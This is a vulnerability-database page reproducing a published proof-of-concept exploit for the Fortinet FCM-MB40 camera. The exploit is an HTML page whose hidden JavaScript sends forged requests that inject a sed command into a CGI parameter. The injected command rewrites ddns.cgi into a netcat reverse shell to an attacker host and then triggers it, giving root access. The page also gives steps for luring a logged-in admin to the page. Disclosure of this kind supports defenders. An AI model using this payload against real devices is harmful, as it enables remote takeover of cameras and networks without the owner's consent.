Lucene search
K

Fortinet FCM-MB40 Cross Site Request Forgery / Remote Command Execution

🗓️ 25 Jun 2019 00:00:00Reported by XORcatType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 105 Views

Fortinet FCM-MB40 CSRF to RCE as roo

Code
`# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF  
# Date: 2019-06-19  
# Exploit Author: @XORcat  
# Vendor Homepage: https://fortinet.com/  
# Software Link: Customer Account Required  
# Version: v1.2.0.0  
# Tested on: Linux  
# CVE : TBA  
  
<html>  
<!-- FCM-MB40 CSRF to RCE as root, by Aaron Blair (@xorcat)   
  
Full details: https://xor.cat/2019/06/19/fortinet-forticam-vulns/  
  
Follow the following steps to demonstrate this PoC:  
  
1. Replace IP addresses in Javascript code to repr esent your testing  
environment.  
2. Launch a `netcat` listener on the attacker's host using `nc -nvlp  
1337`  
3. Ensure the "admin" user's browser is logged in to the FCM-MB40.  
* Note: all modern browsers will cache Basic Authentication  
credentials (such as those used by the FCM-MB40) even if the  
FCM-MB40's administration page is closed.  
4. Open the crafted HTML document using the "admin" user's  
browser.   
* Note: In an attack scenario, this step would be performed by  
implanting the code into a legitimate webpage that the "admin"  
user visits, or by tricking the "admin" user into opening a page  
which includes the code.  
5. Note that the `netcat` listener established in step 2. has received  
a connection from the camera, and that it is presenting a `/bin/sh`  
session as root.  
* Note: type `id` in the `netcat` connection to verify this.  
  
_Note: After this issue has been exploited, the state of the system will  
have changed, and future exploitation attempts may require  
modification._  
-->  
<head>  
<script>  
const sleep = (milliseconds) => {  
return new Promise(resolve => setTimeout(resolve, milliseconds))  
};  
var sed_url = 'http://192.168.1.20/cgi-bin/camctrl_save_profile.cgi?num=9&name=a%20-e%20s/^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/%20../cgi-bin/ddns.cgi%20&save=profile';  
var execute_url = 'http://192.168.1.20/cgi-bin/ddns.cgi';  
  
var sed_img = document.createElement("img");  
sed_img.src = sed_url;  
  
sleep(400).then(() => {  
var execute_img = document.createElement("img");  
execute_img.src = execute_url;  
});  
</script>  
</head>  
<body>  
<h1>Welcome to my non-malicious website.</h1>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation